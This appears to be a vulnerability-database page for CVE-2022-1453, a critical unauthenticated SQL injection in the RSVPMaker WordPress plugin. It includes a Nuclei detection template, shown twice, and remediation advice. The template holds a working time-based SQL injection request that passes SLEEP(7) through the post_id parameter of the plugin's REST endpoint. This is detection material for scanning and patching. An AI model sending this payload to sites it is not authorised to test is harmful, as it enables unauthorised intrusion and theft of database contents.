RSVPMaker <= 9.2.5 - SQL Injection

CVE-2022-1453

Verified

Description

The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to missing SQL escaping and parameterization on user supplied data passed to a SQL query in the rsvpmaker-util.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to and including 9.2.5.

Severity

Critical

CVSS Score

9.8

Exploit Probability

62%

Published Date

February 22, 2026

Template Author

shivam kamboj

CVE-2022-1453.yaml

id: CVE-2022-1453

info:
  name: RSVPMaker <= 9.2.5 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to missing SQL escaping and parameterization on user supplied data passed to a SQL query in the rsvpmaker-util.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to and including 9.2.5.
  impact: |
    Attackers can retrieve sensitive data from the database without authentication, leading to data breach and privacy violations.
  remediation: |
    Update to version 9.2.6, or later
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rsvpmaker/rsvpmaker-925-unauthenticated-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1453
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1453
    epss-score: 0.61558
    epss-percentile: 0.98348
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,rsvpmaker,vkev

http:
  - raw:
      - |
        @timeout: 30s
        GET /wp-json/rsvpmaker/v1/sked/1?post_id=(SELECT%209999%20FROM%20(SELECT(SLEEP(7)))a) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'status_code == 200'
          - 'regex("false$", body)'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a004730450221009ff8fab5e872a5dda56ca4e9d77f498439e5d76d4ae2ef3d3de2c0e1c56bedb402204e55b46592b1509cb287389bae3ab4b6382c55a52b9763d38e6d0c2c3bfb3259:922c64590222798bb761d5b6d8e72950

9.8Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE ID:

cve-2022-1453

CWE ID:

cwe-89

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rsvpmaker/rsvpmaker-925-unauthenticated-sql-injection https://nvd.nist.gov/vuln/detail/CVE-2022-1453

Remediation Steps

Update to version 9.2.6, or later

Description

id: CVE-2022-1453

info:
  name: RSVPMaker <= 9.2.5 - SQL Injection
  author: Shivam Kamboj
  severity: critical
  description: |
    The RSVPMaker plugin for WordPress is vulnerable to unauthenticated SQL Injection due to missing SQL escaping and parameterization on user supplied data passed to a SQL query in the rsvpmaker-util.php file. This makes it possible for unauthenticated attackers to steal sensitive information from the database in versions up to and including 9.2.5.
  impact: |
    Attackers can retrieve sensitive data from the database without authentication, leading to data breach and privacy violations.
  remediation: |
    Update to version 9.2.6, or later
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rsvpmaker/rsvpmaker-925-unauthenticated-sql-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1453
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1453
    epss-score: 0.61558
    epss-percentile: 0.98348
    cwe-id: CWE-89
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2022,wordpress,wp,wp-plugin,sqli,rsvpmaker,vkev

http:
  - raw:
      - |
        @timeout: 30s
        GET /wp-json/rsvpmaker/v1/sked/1?post_id=(SELECT%209999%20FROM%20(SELECT(SLEEP(7)))a) HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration >= 7'
          - 'status_code == 200'
          - 'regex("false$", body)'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a004730450221009ff8fab5e872a5dda56ca4e9d77f498439e5d76d4ae2ef3d3de2c0e1c56bedb402204e55b46592b1509cb287389bae3ab4b6382c55a52b9763d38e6d0c2c3bfb3259:922c64590222798bb761d5b6d8e72950

RSVPMaker <= 9.2.5 - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

RSVPMaker <= 9.2.5 - SQL Injection

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps